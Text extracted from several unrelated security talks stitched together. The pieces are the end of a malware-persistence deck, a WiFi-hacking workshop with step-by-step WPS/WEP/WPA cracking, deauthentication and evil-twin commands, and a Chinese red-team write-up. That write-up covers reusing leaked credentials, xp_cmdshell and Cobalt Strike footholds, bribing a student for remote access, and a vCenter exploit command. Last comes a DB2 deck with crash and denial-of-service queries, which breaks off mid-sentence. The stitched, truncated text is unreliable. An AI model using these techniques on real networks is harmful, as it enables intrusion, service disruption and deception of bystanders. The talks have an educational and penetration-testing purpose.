Yes Yes Winlogon notify package Yes No Yes Svchosts.exe ServiceDll No No No Loading DLLs from kernel No No No CreateRemoteThread No No Yes ShellExecute hooks No No No Event hooks No No No Windows hooks Yes No Yes AppInit_DLLs Yes No Yes Browser helper objects Requires App restart Requires reboot Modifies registry Method Quietly, so no one hears Arms and legs, but no head Malfind vs Coreflood Limbo 2 Greatest threat to 2007 to occur in 2008 Peeper tests code on himself Don’t get high on your own supply Hacker’s own info stealing tool posts info to monitored site How to steal your own identity The End
Wifi Hacking DEFCON China 1.0 2019 This presentation at http://bit.ly/2LeM0U3 > whoarewe // Philippe Delteil // @philippedelteil CS. Engineer@University of Chile Self proclaimed hacker 1st talk at Defcon 26 Skytalks "Macabre stories of a hacker in the public health sector" Hacked over 3,000 wifi routers of Brazil's biggest ISP. Classes for free: CTF, pentesting, programming, basic computer knowledge. In a Free and Open University. Founded a company with a very clever name: Info-sec. > whoarewe //Guillermo Pilleux // @Llipi B.Sc. CS@University of Chile Scrappers/crawlers → retrieved 500k Chilean names on genealog.cl Research on HTR for Opticality in Guatemala Cybersecurity → 2nd internship in Info-Sec → This Workshop > Introduction: Very brief history of Wifi '97 creation of 802.11 → IEEE802.11 '99 → WEP 2001 → WEP exploits 2003 → WPA 2004 → WPA2 → IEEE 802.11i 2006 → WPS 2011 → WPS vulns 2017 → WPA2 vulns (KRACK) 2018 → WPA3 2019 → 5 vulns WPA3 > Wifi: How does it work? Radio waves transmission Radio signal → router Router → decodes the signal → Ethernet connection Two-way traffic Data from Internet ↔ router ↔ radio signal ↔ machine's wireless adapter. > Wifi: How does it work? > Lab Preps: VM install 1. Pendrives with persistent Kali Linux Slow machines || Not enough RAM || Small HDD 2. Host + VirtualBox 5.2.18 + Kali VM Get your flavour https://bit.ly/2xHsHcI VirtualBox Guest Additions installed? How to install it Windows https://bit.ly/2ZL6Nln Linux https://bit.ly/2J5wWVU +sudo usermod -a -G vboxusers $USER > Lab Preps: Wireless Adapter Alfa AWUS036NHA OS Hosts Install Drivers Windows Windows 8/10 Windows 7/Vista/XP MacOS 10.13/10.12 Linux rtl8812au > Lab Preps: Know your victims! Cheapest Wifi router ~US$20 Includes: WEP WPS WPA/WPA2 > Lab Preps: VM configurations Wireless Card Configuration Adapter will be named wlan0, wlan1,.., wlanN Avoid adapter with names difficult to remember > sudo sed -i 's/GRUB_CMDLINE_LINUX=\""/GRUB_CMDLINE_LINUX=\"net.ifn ames=0 biosdevname=0\"/' /etc/default/grub > Lab Preps: Last Minute Difficulties Testing > dmesg > WPS How does it work? Helps to have "secure" wireless networks for newbies/devices Single hidden hardcoded value 2011 → brute force attack WPS traffic spoofable 8 numbers → 108 = 100,000,000 key space Last digit checksum → 107 = 10,000,000 7 digits → first 4 and last 3 diff checks → 104 + 103 = 11,000 combinations > WPS Attack Commands Setup monitor interface > airmon-ng start <interface> Display all devices that support WPS > wash --ignore-fcs -i <monitor-mode-interface> Brute force the WPS pin > reaver -i <monitor-mode-interface> -b <mac> -vv Authenticate with WPS pin > reaver -i <monitor-mode-interface> -b <mac> -vv -p <WPS-pin> > WPS Attack Automatization Attack them all! > wget http://bit.ly/2XSs1Ma > Security/Encryptions Why wireless network needs to be encrypted? When you send data over the Internet, you have no power over it once you send it. Anybody can access the data while it is in transit. A way to make your data unreadable to unauthorized users. 1. WEP 2. WPA 3. WPA2 4. WPA3 (FAIL!) Dragonblood Vulnerabilities (next workshop) > WLAN Infrastructure Attacks: WEP (Wired Equivalent Privacy) How does it work? 64 or 128-bit key sizes Stream Cipher RC4 (encrypting data 1 bit at a time) Key is static and is entered manually into AP 2001 WEP was compromised Very easy to crack! Some traffic is required > WLAN Infrastructure Attacks: WEP Diagram > WLAN Infrastructure Attacks: WEP Vulnerabilities ⭐Packets are encrypted with the AP PSK (Pre Shared Key) ⟶ Intercept many packets ⇔ decypher the PSK > WLAN Infrastructure Attacks: WEP NOW, locate and attack the WEP! (1) Start interface > ifconfig wlan0 up > airmon-ng start wlan0 #this creates wlan0mon (monitor mode interface) (2) Look for target > airodump-ng <monitor-mode-interface> (3) Sniff packets. Stop airodump and fix channel > airodump-ng -c <ch> --bssid <mac> -w <output> <mon-mode-interface> (4) In another terminal, deauth the AP > aireplay-ng -10 -b <bssid> <monitor-mode-interface> (5) Wait for #DATA to reach ~10k → crack the password > aircrack-ng <outputname.cap> > WLAN Infrastructure Attacks: WEP Attack Automatization: One channel at the time > wget https://bit.ly/2GQJsHp > chmod +x crackWEP.sh Execute! > ./crackWEP.sh <bssid> <channel> <interface> > WLAN Infrastructure Attacks: WPA (Wifi Protected Access) How does it work? WPA-TKIP & WPA-PSK (2003) IEEE 802.11i standard 128-bit key size with TKIP (Temporal Key Integrity Protocol) and 256-bit key with PSK (Pre-Shared Key) Stream Cipher RC4 for encryption. TKIP → per-packet-key that dynamically creates a new 128-bit key for each packet > WLAN Infrastructure Attacks: WPA2 How does it work? Developed 2004 → Adopted 2006 Replaced WPA TKIP/PSK Supports Advanced Encryption Standard (AES) with available key sizes of 128, 192, and 256-bit. > WLAN Infrastructure Attacks: WPA/WPA2 How does it work? PSK (Pre-Shared Key) is used to generate PMK (Pairwise Master Key), which is used together with ANonce (AP Nonce) to create PTK (Pairwise Transient Key). PTK is divided into KCK (Key Confirmation Key, 128 bit), KEK (Key Encryption Key, 128 bit) and TEK (Temporal Encryption Key, 128 bit). KCK is used to construct MAC in EAPOL packets 2,3 and 4. KEK is used to encrypt data sent to client (e.g. GTK). TEK is used for encrypting traffic between client and AP. > WLAN Infrastructure Attacks: WPA/WPA2 WPA/WPA2 4-way handshake How does it work? 1. AP sends ANonse (AP Nonce) to client, which is basically a random Integer of 256 bits. 2. Client use the ANonce and PMK to generate PTK (Pairwise Transient Key), and send CNonce (Client Nonce) and MAC. 3. AP sends MAC and GTK (Group Temporal Key) to client. 4. Client send ACK with MAC. > WLAN Infrastructure Attacks: WPA/WPA2 Vulnerability Algorithm only checks KCK part of the PTK is correct (4th frame of the MIC). No need to check other parts of PTK. Why? 1. MIC verification is how AP checks the validity of PTK (thus the password) 2. Chances of a password producing PTK that has valid KCK but invalid other parts are really low: KCK is 128 bits, so probability of incorrect password producing correct KCK is 2-128 ~ 1/3x1038 > WLAN Infrastructure Attacks: WPA/WPA2 Vulnerability ⭐ 4-way Password Cracking works like this: 1. 4-way handshake is parsed to get SP and STA addresses, AP and STA nonces, and EAPOL payload and MIC from 4th frame 2. Candidate password is used to compute PMK 3. PTK is computed from PMK, AP and STA addresses and nonces 4. KCK from computed PTK is used to compute MIC of the EAPOL payload obtained at step 1 5. Computed MIC is compared to the MIC obtained at step 1. If they match then candidate password is reported as correct > WLAN Infrastructure Attacks: WPA/WPA2 > WLAN Infrastructure Attacks: WPA/WPA2 Practice attacks (1) Start interface > ifconfig <interface> up > airmon-ng start <interface> (2) Look for target > airodump-ng <monitor-mode-interface> (3) Specify your target. Stop previous airodump and fix channel > airodump-ng --bssid <target-bssid> -c <ch> -w <output> <mon-mode-interface> (4) In another terminal, deauth the AP > aireplay-ng -0 10 -a <target-bssid> --ignore-negative-one <mon-mode-interface> Repeat (4) until WPA handshake message appears at top right corner Stop airodump Crack the key with wordlists: some wordlists @ /usr/share/wordlists/metasploit > aircrack-ng <outputname.cap> -w <wordlist> > WLAN Infrastructure Attacks: WPA/WPA2 Attack Automatization Shell Script that attacks every AP in the surroundings > wget https://bit.ly/2LcX8AK > WLAN Infrastructure Attacks: WPA/WPA2 Cracking passwords in the cloud using gpuhash.me Basic search 8 digits key space Common WPA wordlists Free. If found 0.001 BTC (~US$5,4) to get password Advanced search Better wordlists and keyspaces Pay in advance 0.005 BTC (~US$27) Free if found > WLAN Infrastructure Attacks: WPA/WPA2 Cracking passwords in the cloud using gpuhash.me Advanced search 9-10 digits + 8 hex upper/lower case Pay in advance 0.01 BTC (~US$54) Free if found Cons Takes time Semi-manual API only sends handshakes > WLAN Infrastructure Attacks: WPA/WPA2 Cracking passwords GPUs in AWS Use up to 16 NVIDIA K80 GPUs Pay per use US$0.425 per GPU/Hour Cons Gather dictionaries (language dependent) Configure environment Performance is not that good > Client Attacks: Caffe Latte Attack WEP Attack Using just the client. Doesn't need the client near the network. Important: Have the client in (not associated) mode. As the client connects to the fake AP Caffe Latte attack starts Create the fake AP > airbase-ng -c <channel> -a <bssid> -e <essid> -L -W 1 <interface> Start collecting data packets from the AP > airodump-ng --bssid <bssid> -w <file.cap> <interface> Start aircrack-ng as well > aircrack-ng <airodump file.cap> > Client Attacks: Hirte Attack Caffe Latte Extension - Fragmentation Create fake AP (-L option instead of -N for Hirte Attack) > airbase-ng -c <channel> -a <bssid> -e <essid> -L -W 1 <interface> Capture packets for Honeypot > airodump-ng -c <ch> --bssid <bssid> --write <outfile.cap> <interface> Once client connects to our Honeypot AP, Hirte attack is launched automatically by airbase-ng Start cracking > aircrack-ng <airodump file.cap> Competing with the legitimate router Bring up the AP Connect the client to the legitimate AP Bring up the fake AP with previous command Send broadcast deauth messages Clients should connect to your fake AP Note: The client will connect to the fake AP only IF it has higher signal strength than the legitimate > Client Attacks MITM (Evil Twin + Eavesdropping) > Client Attacks MITM (Evil Twin + Eavesdropping) Create soft AP > airbase-ng --essid <essid> -c <channel #> <interface> airbase-ng creates an interface at0 (tap interface) → check ifconfig at0 Create a bridge eth0 ↔ at0 > brctl addbr <bridge name> > brctl addif <bridge name> eth0 > brctl addif <bridge name> at0 > ifconfig eth0 up > ifconfig at0 up Assign IP address to the bridge (e.g. ) ifconfig <bridge name> <ip> up ping Turn on IP forwarding in kernel to ensure packets are forwarded > echo 1 > /proc/sys/net/ipv4/ip_forward > Client Attacks MITM (Evil Twin + Eavesdropping) Connect client to the mitm AP. Check connectivity and pinging > ping Start Wireshark in the at0 interface. Apply ICMP filter Ping from the client machine Deauth clients on the real AP Check the airbase-ng terminal for the clients connectivity > Client Attacks MITM (Evil Twin + Eavesdropping) > Denial of Service (deauth & disassociation) (1) Start interface > ifconfig <interface> up #e.g. wlan0 > airmon-ng start <interface> #creates wlan0mon (monitor mode) (2) Look for target > airodump-ng <monitor-mode-interface> (3) Stop previous airodump and fix channel > airodump-ng -c <ch> --bssid <target-bssid> <mon-mode-interface> (4) In another terminal, deauth the AP > aireplay-ng -0 0 -b <target-bssid> <mon-mode-interface> # -0 parameter ≡ --deauth # 0 parameter ≡ deauth forever # Check aireplay-ng --help for more parameters > Pwned Wifi attacks AP Login Attack (break into the AP using default passwords) 1. Once inside the network, connect to the router: > firefox $(ip route | grep default | awk '{print $3}') 2. Look for the "Local Network" → DNS section 3. Type in your 'malicious' DNS IP 4. Save & Restart > Pwned Wifi attacks Session/DNS hijacking.Session/DNS hijacking. DNS Record all DNS requests Use info to do a more effective phishing attack > Devices Wifi Pineapple US $34 (GearBest) Wireless USB Adapter Long Range 3km Long Range WiFi Repeater 5 kms. US $220 (Amazon) US$100 Hak5 > Conclusions Wifi security is weak Even WPA3 is vulnerable Wifi is ubiquitous WEP is still in the wild People think Wifi is secure but it's not! Wifi attacks are cheap and easy Evil twin is effective
0x00 前⾔ 作者J0o1ey,有技术交流或渗透测试/Redteam培训需求的朋友欢迎联系QQ/VX-547006660 本⽂简单记述了⼀下本⼈在某攻防演练过程中⼀次层层突破的有趣经历 技术性⼀般,但是层层突破属实艰难,并⽤到了⽐较多的思路,还望各位⼤佬多多指教 0x01 SSO账号获取 由于⽬标是某⼤学,对外开放的服务基本上都是⼀些静态Web⻚⾯,没什么太多利⽤点 因此获取⼀个该⼤学的SSO账号就显得尤为重要~ 本⼈使⽤该⼤学的域名、以及常⻅的搜索密码关键词,调⽤Github的api在Github中定位到了就读该⼤学的关键⽤ 户 该同学安全意识较为薄弱,经常将账号密码硬编码在程序内,这正是我们苦苦寻觅的⼈才 结合他在其他项⽬中硬编码的学号,我们成功利⽤他的学号+密码登陆该⼤学SSO系统和学⽣vpn系统 本来以为可以进驻内⽹了,结果发现学⽣VPN除了访问⼀些学术资源,啥也⼲不了 好在进去SSO了,那么后⾯接近靶标之路就会更加轻松,现在⾃然要把着⼒点放在SSO能访问到的系统漏洞挖掘上 0x02 某系统接⼝利⽤测试tips获取⼤量信息 ⾛了⼀遍SSO能访问的系统 发现某项⽬申请处,可以搜索学校其他同学的信息 如图,接⼝在流量中是这样表现的 我们利⽤⼀个测试tips,将其中的关键键置空,或者使⽤通配符*,发现可以成功返回全校三万多名学⽣的信息 凭此成果,仅能得⼀点可怜的分数,还得继续来撸 我继续在系统重翻找接⼝,终于发现了⼀个可以搜索学校⽼师的接⼝ 同样的使⽤刚刚的tips,在关键的键处置空键值或使⽤*,这次运⽓很好,返回的信息中,甚⾄出现了所有⽼师的 ⼯号和md5加密的密码 甚⾄包括sso管理员的密码。。。 解了⼀下admin的密码,⾮常遗憾,解不开,不然游戏就直接结束了~ 但我们现在掌握了⼤量⽼师的⼯号,密码(包括负责运维的⽼师),那么我们后⾯进驻内⽹的⼯作就会顺利很多 0x03 进驻DMZ区并获取内⽹跳板 我们做了很⻓时间的信息搜集,找到了该学校开放在外⽹给运维⼈员使⽤的DMZ区VPN 我们直接⽤刚刚获取到负责运维的⽼师的账号密码登录,发现⼀直不好使... 结果试了⼀下,发现密码竟然和⼯号是⼀致的....真是⽆语... 随后就成功接⼊了该学校DMZ区VPN 进⼊DMZ区后,我们简单做了⼀下弱⼝令扫描探测,发现了⼀台SqlServer的弱⼝令 直接通过恢复执⾏xp_cmdshell,发现还是管理员权限 但是列进程的时候发现了万恶的某60 试了试⾃⼰之前的certutil下载⽂件绕过⽅法,因为之前交了360SRC,已经被修复了,TMD直接被拦 但是仔细⼀想,SqlServer中是存在LOL bin的,可以实现⽩利⽤执⾏powershell 通过此姿势,成功上线CS 如此⼀来,访问内⽹核⼼区的跳板就有了~ 0x04 被踢出内⽹与收买学校内⻤ 还没等开⼼⼀会,突然发现CS的进程已经被下掉了,并且DMZ区账号也被踢下线并改密码了 估计是⽬标机有主机安全设备,检测到了进程中的CS内存特征或流量特征。。。 线索全断,让⼈陷⼊了沉思,不过转念⼀想,内⽹代理套代理也是卡的要死,还不如想想办法如何直接获取内⽹核 ⼼区的访问权限 我们于是在咸⻥上开始寻找猎物,发现了就读于该⼤学的某学⽣ 该学⽣咸⻥上挂的具体内容忘记截图了,⼤体意思是”我是xxx⼤学的学⽣,可以为⼤家提供xxx⼤学的有关帮助, 考研,⽣活等等等,视难度收费10-50“ 我们直接加他联系⽅式,给他转了50。 话术如下 LOL bin C:\Program files (x86)\Microsoft SQL Server\xxx\Tools\Binn\SQLPS.exe C:\Program files (x86)\Microsoft SQL Server\xxx\Tools\Binn\SQLPS.exe whoami 就这样,我们连上了这个⼆傻⼦的向⽇葵 然后直接⽤他的cmd,把权限给到CS,做好权限维持 我:你好你好,我是xx⼤学的学⽣,现在在外⾯,回不去学校,想⽤下你的电脑,访问学校内的教务系统,给您50元答 谢 对⽅:哦哦可以,你看看怎么整 我:你下个向⽇葵,然后把主机号和密码发给我就好 对⽅:okok 把隧道传出来,发现学⽣的PC竟然可以直接访问核⼼区。。。随后在内⽹⼜开始了扫描,撸了⼀些乱七⼋糟的系 统,⽐如海康某设备的RCE,web系统的注⼊,⽹关等等东⻄,但都没法反弹shell。。 当时⼜发现了⼀个SSH弱⼝令,可给我们⾼兴坏了,⼆话不说连过去 当看到这⼀幕的时候,⼀身冷汗,因为⾮常清楚,⾃⼰踩到内⽹蜜罐了,⼜要寄了。。。 果然不出20分钟,那位同学就发来了微信 ⽓煞我也,后⾯想继续⽤⾦钱收买,道了歉,说⾃⼰⼀不⼩⼼传错软件了,⼜给他转了20块钱,想再⽤⼀阵 可谁知 ⽓煞我也,竟然不讲武德 0x05 近源渗透直捣⻩⻰ 眼看着所有能通向内⽹核⼼区的路径全寄了,我们只能想办法出奇制胜,摇⼈去近源渗透 叫甲⽅派了了个⼈,混进学校内的图书馆,⽤之前获取到的学⽣sso账号接⼊校园⽹ 如此⼀来,我们就有了稳定且不易察觉的内⽹通道 接下来就是常规操作了,漏扫核⼼⽹段,发现了docker api未授权和vcenter的RCE 可控制数⼗个镜像 核⼼区VCenter存在CVE-2021-21972漏洞,可直接写⼊Webshell 随后可利⽤Vcenter的shell权限实现cookie伪造 使⽤脚本 https://github.com/horizon3ai/vcenter_saml_login/blob/main/vcenter_saml_login.py 使⽤⽣成的cookie进驻VCenter 分数刷满,润了~ 0x06 末⾔ 本⽂没有过多的技术性东⻄,主要是跟⼤家分享⼀下⾃⼰打攻防被”围追堵截“的经典案例,给奋⽃在攻防⼀线的兄 弟加油⿎劲 权限掉了,被踢出内⽹,莫要灰⼼⽓馁,⻅招拆招,才是攻防的乐趣所在 python3 vcenter_saml_login.py -t Vcenter内⽹ip -p data.mdb data.mdb路径 windows:C:/ProgramData/VMware/vCenterServer/data/vmdird/data.mdb linux:/storage/db/vmware-vmdir/data.mdb
Hacking and Securing DB2 LUW Alexander Kornbrust – Red-Database-Security GmbH Table of Content   Information   Known DB2 LUW Exploits   Vulnerabilities in custom DB2 code   Accessing the OS from the DB   Hardening DB2   Summary Information   Version History   Where to get DB2 LUW   Pre-installed DB2 Image(s)   Architecture   How to connect to DB2 Version History 9.7 (Cobra) DB2 9.7 for LUW Released 9.7.4 19-Apr-2011 9.7.3a 02-Dec-2010 9.7.3 10-Sep-2010 9.7.2 28-May-2010 9.7.1 24-Nov-2009 9.7.0 28-Aug-2009 End of Support 20-Sep-2014 Extended Support 30-Sep-2017 Version History 9.5 (Viper 2) DB2 9.5 for LUW Released 9.5.7 13-Dec-2010 9.5.6 27-Aug-2010 9.5.5 14-Dec-2009 9.5.4 25-May-2009 9.5.3 08-Dec-2008 9.5.2a 23-Sep-2008 9.5.2 22-Aug-2008 9.5.1 11-Apr-2008 9.5.0 14-Dec-2007 End of Support 30-Apr-2013 Extended Support 30-Apr-2016 Version History 9.1 (Viper) DB2 9.5 for LUW Released 9.1.10 18-Feb-2011 9.1.9 08-Apr-2010 9.1.8 28-Sep-2009 9.1.7 30-Mar-2009 9.1.6 14-Oct-2008 9.1.5 30-May-2008 9.1.4 13-Nov-2007 9.1.3 15-Aug-2007 9.1.0 22-Sep-2006 End of Support 30-Apr-2012 Extended Support 30-Apr-2015 Where to get DB2 LUW Download from IBM (requires account)   Free Express Edition (various platforms) http://www.ibm.com/developerworks/ downloads/im/udbexp/index.html   Trial Versions https://www14.software.ibm.com/webapp/iwm/ web/reg/pick.do?source=swg-dm-db297trial Older versions of DB2 are difficult to find for non-IBM customers. Pre-installed DB2 Image(s)   DB2 9.7.2 - Dubuntu (Ubuntu 10.04 LTS) http://db2hitman.wordpress.com/dubuntu- server-v4/   DB2 9.5 Express-C (Suse Linux 10.0) http://www.vmware.com/appliances/directory/ 109333   DB2 9.7.1 Data Server (Sue Linux Enterprise 11) https://www14.software.ibm.com/webapp/iwm/ web/reg/pick.do?source=swg-dm-db297trial DB2 - Architecture How to connect to DB2   Command Line: 1. Connecting to an DB2 LUW using CLP C:\> db2cmd c:\> db2 db2 => db2 connect to sample db2 => SELECT * FROM SYSIBMADM.ENV_PROD_INFO How to connect to DB2 Known DB2 Exploits   9.5   9.7   Analyzing FixPacks for unknown vulnerabilities Known DB2 Exploits – 9.5 Unsecure Random   Unsecure Random (bug, <9.5 FP5, <9.7 FP1) Denial of Service   Heap Overflow Repeat (DB2 <V9.1 FP9, <V9.5 FP6, and <V9.7 FP2)   Data Stream DoS (<9.5 FP3a)   Malicious Connect DoS (<9.5 FP3a) Instance Crash   Order by with XMLtable (<V9.5 FP6a)   Remove duplicate predicates (9.7<FP2, <V9.5 FP6a)   Single byte partition (9.7<FP2, 9.5 < FP6)   Create table MQT (9.7<FP3, 9.5 < FP6)   Like in a mixed/EUC codepage database (9.7<FP3, 9.5 < FP6)   Keywords in insert statement (9.7<FP3, 9.5 < FP6) Known DB2 Exploits – 9.7 Unsecure Random   Unsecure Random (bug, <9.5 FP5, <9.7 FP1) Denial of Service   kuddb2 DoS ( 9.7.1)   Heap Overflow Repeat (DB2 <V9.1 FP9, <V9.5 FP6, and <V9.7 FP2) Instance Crash   Remove duplicate predicates (9.7<FP2)   Large number of unions (9.7<FP2)   Single byte partition (9.7<FP2)   Create table MQT (9.7<FP3, 9.5 < FP6)   XML Host Variables (9.7<FP3)   Like in a mixed/EUC codepage database (9.7<FP3, 9.5 < FP6)   Keywords in insert statement (9.7<FP3, 9.5 < FP6) Unsecure Random select c1,rand() from test1 order by 2;
 select c1,rand() from test1 order by 2; Heap Overflow Repeat Found: Intevydis SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1 Data Stream D.o.S. Found: Dennis Yurichev # Discovered by Dennis Yurichev dennis@conus.info
 # DB2TEST database should be present on target system
 from sys import *
 from socket import * sockobj = socket(AF_INET, SOCK_STREAM)
 sockobj.connect ((argv[1], 50000))
 "\x47\x9D\x37\x88\xA8\x77\x23\x43") sockobj.close() Malicious Connect D.o.S. Found: Dennis Yurichev http://blogs.conus.info/node/17 Order by with XMLtable Crash Found: IBM If you run a SQL, order by with xmltable table function which works on a constructed or inlined xml document, as below, the instance may be crashed. : (SELECT XMLELEMENT(NAME "root", XMLAGG( XMLELEMENT(NAME "kind", XMLELEMENT(NAME "id", trim(ki.id)), XMLELEMENT(NAME "d_id", trim(ki.d_id)), XMLELEMENT(NAME "name", km.name), XMLELEMENT(NAME "d", km.d) ) ORDER BY km.d ) as kind ) : , xmltable( '$KIND/kind[1]' COLUMNS col1 DECIMAL(8,0) PATH './d', col2 VARCHAR(10) PATH './id', col3 VARCHAR(10) PATH './d_id' ) ORDER BY col1 ASC, col2 ASC, col3 ASC ; Duplicate Predicates Crash Found: IBM select * from table1 where col1=2 or col1=2 or col1=2 or col1=2 or col1=2 Single Byte Partition Crash Found: IBM DATABASE prova USING CODESET iso885915 TERRITORY it;
 CONNECT TO prova;
 CREATE TABLE zzz (ID VARCHAR FOR SBCS DATA NOT NULL) PARTITION BY (ID)(PART P0 STARTING (MINVALUE) IN TS1,PART P1 STARTING('A ') ENDING('Z ') IN TS1); Create Table MQT Crash Found: IBM A query containing MIN or MAX aggregate function and referring to MQT with group by clause can cause an instance crash. -- MQT defintion
 create table t1 (x int);
 create table t2 (a int, b int);
 create table MQT as (
 select x
 from t1
 group by x
 ) data initially deferred refresh deferred; refresh table mqt; -- Query traps
 select min(b)
 from t1, (select a, b from t2 group by a, b)
 where x = a and a = 1
 group by a; To hit the trap, the following conditions need to be satisfied: 1. MQT has group by clause and it references to T1 but not T2.
 2. Query has group by clause too.
 3. In query, T1 joins with a (e.g. Group-By) subquery of T2.
 4. Query contains MAX or MIN aggregate whose operand(s)
 involves column from T2 (e.g. min(b)).
 5. All MQT Group-By columns are bound to constant in the query
 (i.e. x is bound to 1 due to query predicates "x=a and a = 1"). Duplicate Predicates Crash Found: IBM select * from table1 where col1=2 or col1=2 or col1=2 or col1=2 or col1=2 Keyword Crash Found: IBM create table t1 (i1 int);
 create sequence SEQ1;
 insert into t1 (SEQ1.currval) values (1); Outer Join Crash Found: IBM create view V as select * from T1 left outer join T2 ...
 select * from V, T3 where V.C1=T3.C2 XML Host Variables Crash Found: IBM This happens because in DPF DB2 tries to collect rids for the XML document being bound in through the APPLICATION host variable and they record these rids in all subsections running on coordinator node which finally results in a bad page error during other operations. DB2 instance crashed during an "insert from select with xml host variable". INSERT INTO security (SECSYM, SDOC) SELECT T.SECSYM, T.SDOC FROM XMLTABLE('declare default element namespace "http://tpox-benchmark.com/security";$SDOC' passing xmlcast(? as xml) as "SDOC" COLUMNS "SECSYM" VARCHAR(15) PATH '*:Security/ *:Symbol', "SDOC" XML PATH '.') AS T Large Number of Unions Crash Found: IBM select * 
 from table1
 select * 
 from table1
 select * 
 from table1
 select * 
 from table1
 select * 
 from table1
 union ... Change Owner Found: IBM [root@... tmp]# touch afile [root@... tmp]# ls -l afile -rw-r--r-- 1 root root 0 2009-08-19 07:03 afile [lelle@... tmp]$ db2licm -g /tmp/afile [root@... tmp]# ls -l afile -rw-r--r-- 1 lelle lelle 194 2009-08-19 07:04 afile ^^^^^^^^ http://dbaspot.com/ibm-db2/431085-security-problem-db2-9-5-4-a.html Analyzing Fix Packs for unknown vulnerabilities   DB2 Fix Packs often contain sample code to demonstrate vulnerabilities.   Analyzing the Fix Pack documentation often reveals unknown exploits allowing (remote) D.o.S. attacks, database crashes, … Vulnerabilities in custom code   SQL Injection in custom SQL/PL code   SQL Injection in custom PL/SQL code   Source Code Analysis Vulnerabilities in custom code   DB2 9.7 supports 2 kind of programming languages for stored procedures   SQL/PL (IBM procedural language)   PL/SQL (Oracle procedural language, since 9.7)   Majority (based on my experience) of database developers are not doing input validation before using input validation. SQL Injection in custom SQL/PL code CREATE PROCEDURE get_emp_name_v2 ( IN emp_id FLOAT) LANGUAGE SQL BEGIN DECLARE v_dyn_sql VARCHAR(1000); DECLARE v_sql_stmt STATEMENT; DECLARE c_employees CURSOR FOR v_sql_stmt; SET v_dyn_sql = 'SELECT last_name FROM employees WHERE emp_id = ‘ || CHAR(emp_id); PREPARE v_sql_stmt FROM v_dyn_sql; OPEN c_employees; -- FETCH … CLOSE c_employees; END! SQL Injection in custom SQL/PL code Demo SQL Injection in custom PL/SQL code FUNCTION TABLE_IS_EMPTY( SN VARCHAR2, TN VARCHAR2) RETURN BOOLEAN IS CNT INTEGER; SQL_STMT VARCHAR2(100); C1 INTEGER; RC INTEGER; BEGIN SQL_STMT:= 'SELECT COUNT(*) FROM ’| SN||'.'||TN; C1:= DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(C1,SQL_STMT,DBMS_SQL.V7); DBMS_SQL.DEFINE_COLUMN(C1,1,CNT); RC:= DBMS_SQL.EXECUTE(C1); RC:= DBMS_SQL.FETCH_ROWS(C1); DBMS_SQL.COLUMN_VALUE( C1,1,CNT); DBMS_SQL.CLOSE_CURSOR(C1); SQL Injection in custom PL/SQL code Demo Source Code Analysis   Countermeasure against all kind of SQL Injection is the usage of bind variables and/or input validation.   Search for strings “EXEC_DDL_STATEMENT”, “DBMS_SQL”, “DBMS_DDL”, “PREPARE”, “EXECUTE ” Accessing the OS from the DB   Accessing Files   Accessing the Network Accessing Files   utl_file   … utl_file (Sample 1) SET SERVEROUTPUT ON@ CREATE OR REPLACE PROCEDURE proc1() BEGIN DECLARE v_filehandle UTL_FILE.FILE_TYPE; DECLARE isOpen BOOLEAN; DECLARE v_filename VARCHAR(20) DEFAULT 'myfile.csv'; CALL UTL_DIR.CREATE_DIRECTORY('mydir', '/home/user/temp/ mydir'); SET v_filehandle = UTL_FILE.FOPEN('mydir',v_filename,'w'); SET isOpen = UTL_FILE.IS_OPEN( v_filehandle ); IF isOpen != TRUE THEN RETURN -1; END IF; CALL DBMS_OUTPUT.PUT_LINE('Opened file: ' || v_filename); CALL UTL_FILE.FCLOSE(v_filehandle); END@ CALL proc1@ utl_file (Sample 2) SET SERVEROUTPUT ON@ CREATE PROCEDURE proc1() BEGIN DECLARE v_dirAlias VARCHAR(50) DEFAULT 'mydir'; DECLARE v_filename VARCHAR(20) DEFAULT 'myfile.csv'; CALL UTL_FILE.FREMOVE(v_dirAlias,v_filename); CALL DBMS_OUTPUT.PUT_LINE('Removed file: ' || v_filename); END@ CALL proc1@ Accessing the Network   utl_smtp   utl_tcp Accessing the Network Demo Hardening DB2 LUW   Disable Discovery Mode   Change Default Port   Revoking Public Privileges   Secure DB Parameter   Logon Trigger Disable Discovery Mode   db2 update database manager configuration using discover DISABLE   db2 update database manager configuration using discover_inst disable http://publib.boulder.ibm.com/infocenter/db2luw/v9r7/index.jsp?topic=/com.ibm.db2.luw.admin.config.doc/doc/r0000111.html Change Port   db2 update dbm cfg using SVCENAME <port number>   db2 update dbm cfg using SSL_SVCENAME <port number> http://publib.boulder.ibm.com/infocenter/db2luw/v9r7/index.jsp?topic=/com.ibm.db2.luw.admin.config.doc/doc/r0000111.html Revoking Public Privileges I db2 REVOKE SELECT ON SYSCAT.INDEXAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.PACKAGEAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.DBAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.COLAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.TABAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.TBSPACEAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.PASSTHRUAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.ROUTINEAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SCHEMAAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SEQUENCEAUTH FROM PUBLIC Revoking Public Privileges II db2 REVOKE SELECT ON SYSCAT.AUDITPOLICIES FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.AUDITUSE FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.EVENTS FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.EVENTTABLES FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.ROUTINES FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.PACKAGES FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SECURITYLABELACCESS FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SECURITYLABELCOMPONENTELEMENTS FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SECURITYLABELCOMPONENTS FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SECURITYLABELS FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SECURITYPOLICIES FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SECURITYPOLICYCOMPONENTRULES FROM PUBLIC db2 REVOKE SELECT ON 